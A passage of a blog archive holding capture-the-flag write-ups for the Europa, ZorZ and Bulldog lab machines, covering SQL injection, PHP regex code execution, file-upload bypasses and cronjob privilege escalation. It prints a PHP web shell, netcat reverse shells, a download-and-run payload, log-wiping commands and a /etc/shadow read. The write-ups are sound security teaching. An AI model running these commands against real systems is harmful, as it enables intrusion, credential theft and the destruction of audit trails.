\u0026ldquo;Details\u0026rdquo; tab to find a series of drop-downs.\nThe only thing that seems interesting to me here is the issuer: admin@europacorp.htb - a nice username for us to try.\nLet\u0026rsquo;s visit our juicy-sounding admin-portal at\nhttps://admin-portal.europacorp.htb/\nYou may need to allow the certificate again.\n2. Gaining Website Admin Access # We need to find an email and password to login with. The certificate gave us the email address admin@europacorp.htb. We could try to brute-force the password, but there is plenty to attempt before we are forced to try that.\nIf we view the source of the page, we\u0026rsquo;ll see the word \u0026ldquo;form\u0026rdquo; pop up repeatedly. It was pretty evident we were looking at a login form before, but now we have confirmed it.\nA trick I like to employ when we have a login page like this is the --form flag in sqlmap\nsqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form --dbs --batch\nA db called \u0026ldquo;admin\u0026rdquo; is very appealing.\nsqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form -D admin --all --batch\n2 usernames and password hashes!\nNot only that, but it seems the passwords have the same hash! It looks like MD5 to me, so let\u0026rsquo;s check it with HashBuster.\nI have the distinct feeling this is the path the CTF\u0026rsquo;s author wanted us to take.\nFor simplicity\u0026rsquo;s sake, let\u0026rsquo;s try ssh with our usernames. john, admin and root.\nNo luck, but we\u0026rsquo;d be silly not to try.\nLet\u0026rsquo;s log into the site with our newfound credentials.\n3. Exploiting the Website # There\u0026rsquo;s plenty that looks clickable - but not much seems to actually be clickable. The only link that takes us to a new page was \u0026ldquo;Tools\u0026rdquo;\nWhat have we here? The OpenVPN Configuration generator? I know we use an OpenVPN configuration to connect to the HackTheBox VPN - do we need to connect to another VPN to get root access? Is this just the starting machine of a network we need to infiltrate?\nI chased down some of these options for a while, with no luck. I tried putting in my HTB VPN IP address and copying down the \u0026ldquo;Configuration File\u0026rdquo; generated by this page. Starting an OpenVPN connection using that file didn\u0026rsquo;t do anything.\nGetting nowhere, I decided to look at the page\u0026rsquo;s source code. I saw plenty of code that would format to the widgets on the page, but nothing that looked like it drove the \u0026ldquo;Configuration Generator.\u0026rdquo; In order to get a better understanding of what\u0026rsquo;s happening here, we should use a proxy and intercept some requests to see what was going on behind the scenes.\nIf you don\u0026rsquo;t know how to set up ZAP as a proxy, check out my writeup for ZorZ.\nFirst, I typed in the word HELLO into the \u0026ldquo;IP Address of Remote Host\u0026rdquo; box to see where this was worked into the generated configuration.\nIn ZAP, I set a break-point here, and repeated the process.\nBefore decoding, we can recognize the words pattern ip_address ipaddress HELLO and text.\nWe can use ZAP to decode this from URL-style to get text beginning with\npattern=/ip_address/\u0026amp;ipaddress=HELLO\u0026amp;text=\u0026quot;openvpn\u0026quot;: {\nThe pattern= parameter makes me think we are telling the server that the inputted text matches a certain previously determined format, in this case an IP address. This pattern\u0026rsquo;s name, ip_address is encased in / characters. Since our page ends in .php - we can guess this is some sort of PHP syntax.\nAs of this writing, I do not understand much PHP syntax. Outside of my favorite microshell\u0026hellip;\n\u0026lt;?php passthru($_GET[\u0026quot;cmd\u0026quot;]); ?\u0026gt;\n\u0026hellip;I don\u0026rsquo;t know much. Why not try inputting some sort of passthru command as our text?\nI\u0026rsquo;ll alter the microshell and insert a simple whoami command within the passthru.\n\u0026lt;?php passthru(\u0026quot;whoami\u0026quot;); ?\u0026gt;\nIf we have code execution, we should simply see a username appear on the page.\nThis doesn\u0026rsquo;t seem to do much, the page just loads and doesn\u0026rsquo;t even include our string. Doesn\u0026rsquo;t look like we can just paste PHP code\u0026hellip; wait, if it\u0026rsquo;s already PHP - why not just inject the commands without PHP tags?\nWe\u0026rsquo;ll try again, but this time just use\npassthru(\u0026quot;whoami\u0026quot;)\nThis gets us\u0026hellip;\nNot code execution, but we did successfully get our string to replace all instances of \u0026ldquo;ip_address.\u0026rdquo; At the moment, it looks like the limiting factor is my knowledge of PHP.\nLet us go beseech the great oracle for knowledge.\nregex syntax\u0026hellip; of course! We are taking the strings matching a pattern called \u0026ldquo;ip_address\u0026rdquo; and replacing it with a newly inputted string. This sounds exactly like regular expression usage. I\u0026rsquo;ve done this thousands of times for my wordlist projects, why didn\u0026rsquo;t it come to me sooner?\nIf we assume the site uses PHP regex, so what? How can we use this? Maybe we can find some sort of exploit. Let us beseech the oracle once again. A quick search for \u0026ldquo;PHP Regex exploit\u0026rdquo; takes us to an article about PHP regex vulnerabilities- if I recall correctly, MadIrish is the creator of the LampSec CTF challenges, of which I am a big fan.\nAfter reading the page, I think I understand what is happening. If our page is using a certain PHP function to find and replace strings, we will be able to inject some commands by simply adding a single-letter flag. The important bits are found here\nand here.\nExecuting arbitrary commands with the privileges of a webserver sounds exactly like mischief I\u0026rsquo;d like to cause. It seems that if we can simply add e to our request in the right spot, we should be able to execute commands that output to the web page.\nLooking at the example in the 2nd image from the MadIrish article, we see that the replacement string is defined with $string - this seems like it would be analogous to ipaddress parameter in our request. That means the regex to be replaced falls under the pattern parameter, which is where we need to put the e flag. Let\u0026rsquo;s give it a try.\nBefore, our request began with\npattern=/ip_address/\u0026amp;ipaddress=HELLO\u0026amp;text=\u0026quot;openvpn\u0026quot;: {\nLet\u0026rsquo;s edit this to\npattern=/ip_address/e\u0026amp;ipaddress=passthru(\u0026quot;whoami\u0026quot;)\u0026amp;text=\u0026quot;openvpn\u0026quot;: { ...\nWhich in URL-speak, comes out to look like\npattern=%2Fip_address%2Fe\u0026amp;ipaddress=passthru%28%22whoami%22%29\u0026amp;text=%22openvpn%22%3A ...\nand send our request.\nAfter we step through, we see our web page has responded to our command!\nWe have remote code execution!\nOur command executed twice; we don\u0026rsquo;t want that. This happened because ip_address appears twice in the text that is being operated on, so it is replaced twice. If we change our string to something that only appears once, our code will only execute once. Use the string nobody.\nI tried to execute some reverse shell scripts, but wasn\u0026rsquo;t successful the first few times. Eventually, I got it to work by using a favorite trick of mine: hosting a reverse shell script on my own system using a Python Simple HTTP Server, downloading the script to a universally writable directory on the CTF Box, making this script executable and running it. I explain this in depth in the Bulldog CTF Writeup.\nEventually, I was able to get my shell using the netcat without e shell from Ben Clark\u0026rsquo;s Red Team Field Manual.\nWithin my local ~/CTFs/europa directory, I ran\necho \u0026quot;rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc local.machine.ip.addr SHELLPORT \u0026gt; /tmp/f\u0026quot; \u0026gt; script.sh\nAfter setting up my listener and Python Server, I prepared the PHP command,\npassthru(\u0026quot;cd /tmp; wget http://local.machine.ip.addr:hostport/script.sh; chmod +x script.sh; sh script.sh\u0026quot;)\nThen URL encoded and injected it from within ZAP, remembering to include my e flag. (Okay, I forgot the flag the first time.)\npassthru%28%22cd+%2Ftmp%3B+wget+http%3A%2F%2local.machine.ip.addr%3HOSTPORT%2Fscript.sh%3B+chmod+%2Bx+script.sh%3B+sh+script.sh%22%29\nOur shell pops!\n4. Getting the User Flag and Privilege Escalation # On HackTheBox CTFs, the user flag is kept in a /home/USERNAME directory.\nls /home/ ls /home/john cat /home/john/user.txt\nWith the user flag in hand, it\u0026rsquo;s time to enumerate and gain privileges.\nAfter checking for some simple things like hidden files in the user directories, I didn\u0026rsquo;t find anything glaringly obvious. For webservers like this box, I like to check the website folders to make sure I\u0026rsquo;ve seen everything the site had to offer. This can often include databases or other files that contain credentials that might be re-used. These are usually found in the /var/www directory, so let\u0026rsquo;s take a look.\ncd /var/www ls -la\nSome very interesting leads - admin, cronjobs and a folder called cmd we can edit, but is owned by root. Cronjobs often run as root, and can sometimes be misconfigured to interact with a file a lesser user such as ourselves can edit.\ncd cronjobs ls -la cat clearlogs\nInteresting, the cronjob calls a file called /var/www/cmd/logcleared.sh - wasn\u0026rsquo;t cmd the folder we had write access to?\nI see a strategy forming.\nThe root-owned cronjob clearlogs executes the contents of /var/www/cmd/logcleared.sh. We have write access to /var/www/cmd/, so we just need to make a script of our own called logcleared.sh and it will run as root automatically on a periodic basis.\nIf we create reverse shell script, it will run as root and we will be the big bad boss of the box.\ncd ../cmd ls -la\nSince our shell is limited, and my go-to method of getting a TTY using python is off the table (I didn\u0026rsquo;t find python3 on this box until afterwards) - we should write our script on our local machine and then download it using wget like we did before.\nDue to the use of certain characters, I found it easiest to write this script in a full text editor like vim or gedit.\n#!/bin/sh rm /tmp/fa; mkfifo /tmp/fa; cat /tmp/fa|/bin/sh -i 2\u0026gt;\u0026amp;1|nc local.machine.ip.addr ROOTPORT \u0026gt; /tmp/fa and save it as logcleared.sh\nThen, using the same python HTTP Server, use wget on the europa-user shell to download our custom-made logcleared.sh.\nBefore doing this, make sure your listener is active. You wouldn\u0026rsquo;t want to miss the cronjob!\nOn Europa, run\nwget http://local.machine.ip.addr:hostport/logcleared.sh chmod +x logcleared.sh\nNow, we wait. If it takes more than a few minutes, you\u0026rsquo;ve done something wrong. Check your IPs, ports, etc.\nI just love to see that #.\n5. Root Flag and Cleanup # We\u0026rsquo;ve done it. Grab the root flag with\u0026hellip;\ncat /root/root.txt\n\u0026hellip;and if you want, you can be done here. I\u0026rsquo;m going to clean up after myself and remove a few traces of my presence here. NOTE: I am not doing this in the stealthiest way possible. I\u0026rsquo;m doing this to form good habits, but do not see this as an example of a phantom-like disappearance.\ncd /tmp; rm f fa script.sh echo '' \u0026gt; /var/www/cmd/logcleared.sh \u0026amp;\u0026amp; rm /var/www/cmd/logcleared.sh echo '' \u0026gt; /home/john/.bash_history echo '' \u0026gt; /var/log/auth.log echo '' \u0026gt; /var/www/admin/logs/access.log\nIf you want to copy down the user password hashes to attempt to crack them, copy them from cat /etc/shadow | grep '\\$' | cut -d ':' -f -2.\nGood luck cracking, these boxes are designed for this to not be easy.\nIn both your user and root shells, exit with\nkill -9 $$\nThanks to HackTheBox and ch4p for a fun box.\nThanks for reading! # ","date":"2 December 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/europa-htb/","section":"Archive","summary":"","title":"CTF Writeup: Europa on HackTheBox","type":"archive"},{"content":" This is \u0026ldquo;CTF\u0026rdquo; is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.\nThe VulnHub description says:\nThis machine will probably test your web app skills once again. There are 3 different pages that should be focused on (you will see!) If you solve one or all three pages, please send me an email and quick write up on how you solved each challenge. Your goal is to successfully upload a webshell or malicious file to the server. If you can execute system commands on this box, thats good enough!!! I hope you have fun! admin@top-hat-sec.com\nPre-Intro - Setting Up the VM using VirtualBox # As a VulnHub box, you will need to run it as a virtual machine on your own system. There are many ways to do this, but in my opinion, VirtualBox is the easiest. I run mine using VBox on a Kali host machine using a Host-Only Network.\nYou can download it from VulnHub at https://www.vulnhub.com/entry/tophatsec-zorz,117/\nOnce you have virtual box installed, you can simply use the \u0026ldquo;Import Appliance\u0026rdquo; feature to import the OVA file.\nIt is safest to run your Vulnerable VMs on a Host-Only network, which is not connected to the internet.\nYou can find a guide to setting up your Host-Only network here\nOnce your Host-Only Network is set up, set up the VM to connect to the Host Only Network.\nThen you are ready to begin!\nInitial Scans # First thing we will need to do is FIND the box. By default, our host only network is set to 192.168.56.0-255, so we will scan it with nmap.\nnmap -sn -T5 192.168.56.0/24 In my case, my box was assigned the IP 192.168.56.102\nNormally I go ahead and add this to /etc/hosts, but this caused me some trouble this time around, so I opted to just identify it by IP.\nWe know from the description that the box is running a webserver, but just to confirm this we will run a fast nmap scan. We\u0026rsquo;ll also create a new directory to keep ourselves organized.\nnmap -F -T4 192.168.56.102 Our webserver is running on the standard port, so we can go ahead and view it in the browser.\nLevel One # Let\u0026rsquo;s see what we can find out by uploading an image. For this box, I found a creative commons image and made it nice and small. It will be advantageous to use the same image as is shown here, but you can use any image you like. Here is our Test Burrito!\nIf you want to change the file type, just change the URL’s extension to .gif or .png to download other versions. Save it with\nwget https://i.imgur.com/29eCDkq.png -O test_burrito.png Go to the upload page and try to upload it – let’s see what happens.\nWe get this message:\nIt seems to have worked, but we don’t quite know where the file ended up. If we are going to run any of our payloads, we will need to find that out.\nIf we try the /test_burrito.png url, we get a 404.\nLet’s try a directory bruteforcer to see if we can find out where the image uploads. For our wordlist, we’ll use dirbuster’s small directory list, which is found by default on Kali. It can be found at /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, but you can also find it at\nhttps://raw.githubusercontent.com/berzerk0/pastehost/master/directory-list-2.3-small.txt.\nLet’s make a copy into our working ‘a_pentest’ directory.\ncp /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir_list.txt or download it from the above link.\nMy favorite directory bruteforcer is dirsearch. It runs in Python 3, meaning you will not have any trouble getting it to run on whatever operating system you are using. On my Kali system, I have mine installed to /opt/Web_Tools, but you can download it to and run it from your current directory as well.\ngit clone https://github.com/maurosoria/dirsearch will clone the repository to your current directory.\ngit clone https://github.com/maurosoria/dirsearch/opt/dirsearch will clone it to a folder called dirsearch in your /opt/ directory.\nDirsearch requires some extensions to test for, but we aren’t looking for any of those right now. The last page we saw used the .php extension, so we will use .php. Make sure you run the command in the same directory as your copy of the wordlist, or you will have to specify the full path there as well.\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u http://192.168.56.102/ -e php -w dir_list.txt Depending on your machine, the search will take 1-5 minutes. We find a few results, but since we are looking for a place where our image was uploaded, /uploads2/ seems the most interesting. Visit in the browser.\nI don’t see test-burrito.png here. Hmm, this must not be the right directory. Let’s think about what we’ve done so far. We ignored a link that said \u0026ldquo;Try Image Uploader2\u0026rdquo; - which probably places its files into the uploads2 directory. Maybe ours is in uploads1?\nThere we go! Okay, we know how to upload files and confirm they have been uploaded. If we click on the link to the image, we can view it all by itself in the browser. Perfect, this means if we can figure out how to upload code, we can run it directly.\nSo we know we can upload images, but just because our website says “Image Uploader” doesn’t mean we can ONLY upload images. Let’s try some arbitrary text file, and see if that will work for us.\nCreate a simple textfile and try to upload it the same way. I am going to create mine using…\necho 'An image is worth 1000 words.' \u0026gt; proverb.txt Let’s try uploading it.\nIt worked! Now let’s pay it a visit at /uploads1/proverb.txt\nSuccess! It doesn’t look like this site is checking our files very closely. Now that we have proven we can upload text files, let’s try to upload a payload script and start the attack. Since we know we are running php, we can use a php \u0026ldquo;microshell\u0026rdquo; which allows us to simply add commands we want to run on the webserver at the end of a URL. I got this microshell script from the Red Team Field Manual by Ben Clark.\n\u0026lt;?php passthru($_GET[\u0026quot;cmd\u0026quot;]); ?\u0026gt;\nI save mine to a text file using echo.\necho '\u0026lt;?php passthru($_GET[\u0026quot;cmd\u0026quot;]); ?\u0026gt;' \u0026gt; php-microshell.php You can copy and paste if you like, but make sure that your browser doesn’t change the quotation mark characters out of plaintext! If you want to be sure, just delete them and add them yourself.\nIf you want to be REALLY sure, you can download the shell from me.\nIf this shell works the way we hoped, we can just append \u0026ldquo;?cmd=commands\u0026rdquo; (without quotation marks) to the end of our URL.\nGo ahead and upload the php-microshell.php using the same method we have used so far, then visit /uploads1/php-microshell.php\nThere is nothing here! Well, not yet. We need to add some commands into the URL first.\nVisit http://192.168.56.102/uploads1/php-microshell.php?cmd=pwd\nWe have successfully injected a command! This proves we could cause all sorts of trouble on the webserver. We could read files, start a reverse shell, download malware, install another backdoor, or anything else we want! This is a BIG vulnerability.\nLet’s see what else we can find out about the website. If we jump out one directory and run ls, we’ll be able to see what other directories this website has to offer.\nVisit http://192.168.56.102/uploads1/php-microshell.php?cmd=cd .. ; ls\nAll of those seem like they’d belong on a normal website, except for \u0026ldquo;l337saucel337\u0026rdquo;- let’s see what it has to offer. Now that we know that this directory exists, we COULD just view it in the browser… but that’s no fun! Let’s use our shell to view it instead.\nhttp://192.168.56.102/uploads1/php-microshell.php?cmd=ls -l ../l337saucel337\nWell, that’s obviously meant for us to leave alone and not bother with. I mean, it IS a secret.\nhttp://192.168.56.102/uploads1/php-microshell.php?cmd=cat%20../l337saucel337/SECRETFILE\nHey! That was a secret! Stop that!\nAlright, we have two more uploaders to try, so lets go to http://192.168.56.102/index2.html and try the next one!\nLevel Two # Visit http://192.168.56.102/index2.html\nThis looks pretty similar. We already know about /uploads2, so we shouldn’t have to enumerate as much here. Let’s go ahead and try to upload our microshell again, just to see if we can.\nThis uploader must be checking to see that our files really are images.\nLet’s see if we can overcome this hurdle using caveman method and just append \u0026ldquo;.png\u0026rdquo; to the end of our script’s filename.\ncp php-microshell.php php-microshell.png.php It is possible that we can trick the file checker this way, if it is only looking at the filename itself.\nIt was not fooled.\nWe need to try a bit of mischief. Web Application testing software like BurpSuite and OWASP ZAP have the ability to \u0026ldquo;catch\u0026rdquo; http requests before they are sent along to webserver from the browser. We are going to use OWASP ZAP to try to upload our image, then interrupt ourselves and change the content of the file after it leaves the browser, but before it gets to the webserver.\nWithin our browser, it will look just like the file uploads we have done so far, but this time, we will alter what is received by the webserver by running it through a proxy. You will need to have OWASP Zap on your machine to follow along. It is possible to recreate this process in other ways, but for demonstrative purposes, we are going to use ZAP.\nZAP is the \u0026ldquo;Zed Attack Proxy,\u0026rdquo; and we will need to tell our browser that we are using a proxy. By default, ZAP runs on the localhost at port 8008 (127.0.0.1:8008), which we will have to set up in our browser.\nFirefox does have built in proxy preferences, but endorses the FoxyProxy plugin in its Proxy Error messages. (Which I saw while trying to set up the proxy without FoxyProxy)\nIf you aren’t using Kali, go ahead and download the latest version of FoxyProxy and skip the next section.\nKali and FoxyProxy: # At the time of this writing, FoxyProxy’s newest available version doesn’t play well with Kali’s LTS Firefox version. This isn’t that much of a problem, since we can still use the “Old” version from earlier this year.\nKeep in mind that 99.9% of the time, you should USE THE LATEST VERSIONS OF EVERYTHING. Frequently updating your software will keep you safer than any antivirus program ever could. We are allowing ourselves to run the older version because we aren’t connecting to the real internet, only to a VM that doesn’t have the ability to access the internet without us setting it up – which we haven’t. (You are using a Host-Only Network, right? Don’t connect intentionally vulnerable systems the internet!)\nGet your Foxy ProxyVersion 4.6.5 here https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/versions/4.6.5\nEnd of Kali Section\nWith your FoxyProxy installed, open it up and set up your Proxy.\nHit the \u0026ldquo;Add new proxy\u0026rdquo; button, and put in our ZAP parameters of “127.0.0.1:8008”\nThen, select the \u0026ldquo;General\u0026rdquo; tab and name the proxy \u0026ldquo;8080\u0026rdquo; - or whatever you will recognize.\nNow right click the proxy icon, and select \u0026ldquo;Use Proxy “8080 for all URLs\u0026rdquo; - the fox in the icon should turn blue. If you were to try to visit a page now, you will get a proxy error. This is because we have not yet started ZAP. Do so now.\nWhen you open it up, ZAP will greet you with the window shown below. Saving your session is entirely optional. I selected the \u0026ldquo;No\u0026rdquo; option and then the “Start” button.\nWith ZAP up and running, visit http://192.168.56.102/index2.html – this should appear in the ZAP history.\nAll of our interactions in the browser will be noticed by ZAP. In addition to merely logging our upload actions, we want ZAP to intercept at the right time. The easiest way to do this is to upload something, then set a \u0026ldquo;Breakpoint\u0026rdquo; on that activity.\nBegin by uploading the test burrito.\nThis will show up in the ZAP history.\nRight click the history entry and select the \u0026ldquo;Break\u0026rdquo; option from the menu. Then hit \u0026ldquo;Save\u0026rdquo; on the window that appears.\nNow, any interactions that involve a request to /uploader2.php will be intercepted by ZAP. Let’s see if we can upload the test burrito, then alter the data to include our microshell instead.\nBegin by re-uploading the test burrito. ZAP will intercept the request and allow you to edit it.\nIf we look closely at our request, we will see our file has been given a \u0026ldquo;Content-Type\u0026rdquo; Label of \u0026ldquo;image/png\u0026rdquo; and the filename of \u0026ldquo;test_burrito.png.\u0026rdquo;\nBelow those labels is the actual data of the image, which is rendered into text as unicode characters. However, in ZAP, we can edit everything in the request. The first attack we will attempt will be to replace everything after \u0026ldquo;image/png\u0026rdquo; with our microshell code. We will also change the filename to \u0026ldquo;shell_burrito.png\u0026rdquo; to avoid any \u0026ldquo;this file already exists\u0026rdquo; errors.\nThen we hit the \u0026ldquo;Submit and Step To the next request or response\u0026rdquo; button at the top. It is found between the green circle and the greyish triangle.\nIf we hit this button once, we will get a preview of the response. Our file did not successfully upload. If we hit it again, this will show up in the browser as well.\nRats. Don’t worry, however, since this tells us what our next step will be. We know that the file checker does not rely on extensions and the \u0026ldquo;Content Type\u0026rdquo; field to decide what kinds of files it is looking at. This means it likely uses the \u0026ldquo;Magic Bytes\u0026rdquo; method of looking at some of the data at the beginning of a file and making a determination based on that.\nThis changes our attack very slightly. Instead of deleting ALL of the information in the file, we know we just need to allow some to remain at the beginning before sneaking in the microshell.\nUpload the test burrito and alter the request. Chop off most of the file’s data,but leave a bit at the beginning. Then, change the filename to not_a_microshell.png\nThen hit the Step Through button again.\nSuccess!\nLet’s visit the file’s location. We already know about the /uploads2 folder, so let’s see if it’s in there.\nErrors! This message suggests that we need to include .php in our filename, since it didn\u0026rsquo;t like when we tried to upload a .php file, so maybe we need to call our new file microshell.php.png\nRepeat the upload and request editing process, but change the filename to microshell.php.png\nThen step through.\nSuccess! Our \u0026ldquo;image file\u0026rdquo; has been uploaded!\nLet’s visit it at http://192.168.56.102/uploads2/microshell.php.png\nWe have a bit of the data left over, but this is our shell! We can try injecting commands into the URL just like we did for Level 1.\nVisit http://192.168.56.102/uploads2/microshell.php.png?cmd=echo%20this%20shell%20works\nNow visit http://192.168.56.102/uploads2/php-microshell.php.png?cmd=cat%20../l337saucel337/SECRETFILE to see the flag!\nLevel Three # This level uses Javascript, but our attack methodology still applies. Since we already have ZAP running, we can repeat the successful process we did in Level Two.\nWe begin by uploading the test burrito, and then trying to find out where it is kept on the server.\nClick \u0026ldquo;Upload\u0026rdquo; when you are ready.\nHow convenient! Our site tells us exactly where the file is stored! Let’s check on it to verify.\nLooks good, it even made it into the favicon! Let’s set a breakpoint in ZAP like we did for level two, then try to repeat our process. We want to catch the HTTP request, change the data to our php-microshell (except for some bytes at the start), and change the filename to php-microshell.php.png\nLastly, we can visit it in the browser to make sure it is working as expected.\nhttp://192.168.56.102/uploads3/php-microshell.php.png\nThere it is! The same result as level 2! Let’s prove it works by dropping in some commands.\nhttp://192.168.56.102/uploads3/php-microshell.php.png?cmd=echo this shell works on level 3; id\nEverything works the way it did in Level 2 and we have code execution on the webserver.\nConclusion # If you\u0026rsquo;d like to learn more about File Upload Vulnerabilities, check out these links:\nOWASP\u0026rsquo;s Page on Unrestricted File Uploads Hacksplanining on File Upload Vulnerabilities, including a nice section on prevention. A SANS Whitepaper Thanks to TopHatSec for the VM!\n","date":"20 November 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/zorz-vulnhub/","section":"Archive","summary":"","title":"ZorZ - A Few WebApp File Upload Vulnerabilities Explained","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nThere are two versions of this walkthrough: This is the original, NON-INTRODUCTORY VERSION. # A fun box from Vulnhub, written by Nick Frichette. You can find it here at https://www.vulnhub.com/entry/bulldog-1,211/\nHere is the description by the author:\nBulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don\u0026rsquo;t you find out? :)\nAfter their hack by the BlackHat German Shepherds, Bulldog Industries has brought us in to find the rest of the vulnerabilities. They will be happy they did!\nIntroduction # I liked this box for several reasons:\nBulldogs are the best, come on. The Django webserver was a nice new (to me) exploration of a webserver implementation It sticks to the basics while still providing an interesting challenge. There is an attempt to create a real-world context. This write up assumes the reader is using Kali, but all the tools are standard (unless mentioned) in distros like BlackArch as well – except for dirsearch, but you can use dirb or dirbuster as replacements if you like. I ran it on my native Kali host machine using VirtualBox; on a host-only network.\nBefore beginning, I added its IP to my hosts file for convenience.\nMethod # 1. Initial Scans # nmap -sV -T4 bulldog.ctf -oA nmap_JustVersions_bulldog Let’s see, we have SSH on a non-standard port, and two HTTP ports using a Python-based webserver. That’s new to me.\nLet’s start with HTTP, primarily out of habit.\nWith HTTP, I always run nikto, nmap with vulnscan and dirsearch – all at the same time. This is one of the reasons I like tabbed terminal emulators. I use terminator, which is heavy, but I run Kali natively on my desktop so it doesn’t cause too much of a problem. A lighter alternative is Sakura.\nFirst, we run nikto, which often gives me the juiciest pieces of info.\nnikto -h http://bulldog.ctf -output nikto_bulldog.txt That /dev folder might be interesting, we’ll check it first when we do our manual scan.\nNext, we try dirsearch.\nI keep dirsearch in my /opt directory with other Web Tools, and run it twice, with a lot of extensions. I’m trying to be more thorough, and since it is an automated tool, this seems like a good place to start.\nI run it with a script that contains two scans, one with the default wordlist, and one with the medium dirbuster wordlist found (on Kali) in /usr/share/wordlists/dirbuster/\nHere’s my script if you want to give it a go:\n#!/bin/bash #dirsearchem #$1 box name #$2 URL (check for Domain, HTTPS, port first) clear date echo \u0026#34;Running dirsearch on $1 $2\u0026#34; python3 /opt/Web_Tools/dirsearch/dirsearch.py -u \u0026#34;$2\u0026#34; -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar --plain-text-report=dirsearch_$1_quick python3 /opt/Web_Tools/dirsearch/dirsearch.py -u \u0026#34;$2\u0026#34; -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --plain-text-report=dirsearch_$1_BigList date echo \u0026#34;Finished dirsearch on $1 at $2\u0026#34; For demo reasons, I will do these two scans separately. The second scan is often overkill.\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u bulldog.ctf -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar --plain-text-report=dirsearch_bulldog_quick Okay, those look very interesting. We will add /admin and /robots.txt to the list, then begin the big dirsearch scan,\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u bulldog.ctf -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt –plain-text-report=dirsearch_bulldog_bigList Lastly, before browsing around using the “look at it with my eyeballs” scan, we run a full nmap scan with the vulnerability script.\nnmap -A --script=vuln -T4 bulldog.ctf -oA nmap_FullWithVuln_bulldog We’ll give these scans a moment, and begin our manual scan.\n2. Manual Website Investigation # Woof. Business operations are suspended! We have to save the bulldogs! Let’s investigate this public notice.\nI appreciate it when CTF authors slip a bit of humor into their machines. However, it seems to me that the only useful information is that the dirtycow exploit will probably not work on this box. (\u0026ldquo;Smelly cow?\u0026rdquo;)\nLet’s check on the big dirsearch list and see if caught anything new.\nDoesn’t look like it. /notice is new, but that’s the page we are looking at. If we get stuck later we can try dirsearching again and adding -f or -r to force extensions and search recursively.\nAlright, let’s dive into the manual scan, armed with our list of /dev, /admin and /robots.txt. I like to start with robots.txt, since it might contain info that our scans couldn’t access.\nOh no! ASCII art, the mark of a true elite hacker! We will have to remember to deface… I mean, fix this later on. It doesn’t contain anything new however. Let’s check /dev.\n(At this point, I checked on my nmap vulnscan – it had not found anything new, but it did find /robots.txt and /dev “interesting”)\nI like a CTF with an attempt to create real-world context. This is full of useful information.\nTeam Lead: Alan Brooke (sounds like an admin to me) The previous team exploited a webserver vulnerability to gain a low-priv shell then gained root with dirtycow. (A solid strategy, which I will try to reproduce) “We are using some files which may be corrupted from original system\u0026hellip;” (perhaps I can use the some of same strategies the Shepherds used) “We are removing PHP entirely from the new server” (Okay, no php shells) “\u0026hellip;we will not be using PHPMyAdmin or any other popular CMS system\u0026hellip;” (This means that the phpmyadmin I found may be useless. But, rolling your own CMS sounds prone to misconfigurations.) New website it written entirely in Django SSH is enabled, but a Web-Shell is also in use (this shell must be written in Django like everything else) MongoDB is not FULLY installed, but might be partially installed. “It touts being able to run every minute\u0026hellip;” (Sounds like cronjobs to me) A list of usernames is presented to us. The bright-blue “Web-Shell” is a link that takes us to /dev/shell – but we need to log in to the website before being able to access it. My next goal is to access that Web-Shell, and exploit it. Before I do that, I’ll need to appear like I have logged in.\n3. Logging into the Website # Let’s check out that /admin page\nWe have a list of many usernames, so technically we can assume we are halfway to a valid set of login credentials. We have emails, but I don’t think any of them will respond to any phishing attempts.\nWe’ve been told that the site uses Django for everything, and this is also announced at the top of the page. This suggests SQL Injection isn’t going to be helpful here.\nHmm, we can start digging through some page sources to see if we can find something useful. I first checked /admin’s source, but didn’t find anything I new how to use at this time. There is an interesting POST data section called “csrfmiddlewaretoken” - which sounds like there is some kind of system in place against CSRF attacks.\n/dev is directed to internal developers, so it is more likely to have informative comments.\nWell, those comments have the potential to be VERY informative. “Django\u0026rsquo;s default is too complex\u0026hellip; It\u0026rsquo;s not like a hacker can do anything with a hash” - daring us to prove them wrong.\nI copied the emails and hashes into the useful email:hash format. Before I introduce them to my friend John, let’s see what type of hash they are. Now, you can quickly do this on Kali using\nhashid -m THE_HASH but I want to maybe not just identify the hash format, but crack it at the same time, if I can. Enter HashBuster. From experience, I am going to guess they’re SHA1. Hash-Buster seems to only work for SHA1 and MD5 hashes, but that suits us fine.\npython /opt/Hashing_Tools/Hash-Buster/hash.py Okay, we have SHA1, but it didn’t crack. Luckily, we have many hashes to choose from. We can try them all. For best results, let’s run them through John the Ripper and then check them in HashBuster while that is running.\nI’m going to use my own wordlist here, my commonly used Top32Million-probable.txt that you can find in my Probable-Wordlists Repo – this particular list can’t be downloaded from GitHub directly, but torrents and MegaUpload links are provided.\nYou don’t HAVE to use that wordlist, but I had more success with it than the default option. For honesty’s sake, I’ll mention that rockyou works well too.\njohn dev_hashes.txt --format=Raw-SHA1 --wordlist=~/Wordlists/Top32Million-probable.txt Somehow, I don’t find those results surprising. We do have two FULL login credentials now, so let’s try them.\n(For completeness’ sake, I ran all of the hashes through hash-buster, and none came up ¯\\_(ツ)_/¯ - You can google them (and should normally, but that can lead to walkthroughs online and spoilers. Then again, here you are reading one of those – so go nuts!)\nWe COULD try them on the website login, where we know they will probably work, but people reuse passwords all 